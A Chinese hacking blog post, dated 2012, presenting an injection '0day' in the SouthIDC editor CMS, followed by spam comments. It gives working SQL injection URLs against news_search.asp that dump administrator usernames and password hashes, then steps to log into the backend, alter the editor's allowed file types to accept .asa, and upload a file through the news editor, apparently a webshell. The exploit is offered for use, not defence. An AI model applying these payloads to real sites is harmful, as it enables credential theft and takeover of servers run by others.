当前位置: iick's blog > 网站漏洞 > 南方数据编辑器(southidceditor)注入0day漏洞

南方数据编辑器(southidceditor)注入0day漏洞

作者:hack1990 时间:12-02-06 阅读数:1679人阅读

1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

 
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
 
直接暴管理员帐号密码(md5)
 
2.登陆后台
 
3.利用编辑器上传:
 
访问admin/southidceditor/admin_style.asp
 
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传
# Nmap Security Scanner 7.0

上一篇:让webshell无法运行

下一篇:简单的HTML代码弄死Windows 7

相关文章

评论列表

  •  
    发布于 2012-02-12 19:33:23  回复
  • 拜访博主。
    滴答声声博客(www.huasawang.com)提供手表专业知识。
    品美内衣网(www.pinmeineiyi.com)国内最专业的品牌内衣评测网。
    有空来做客。
    •  
      发布于 2012-02-12 21:01:34  回复
    • 好吧,买内衣买表找你!!!
  •  
    发布于 2012-02-12 21:01:34  回复
  • 好吧,买内衣买表找你!!!

发表评论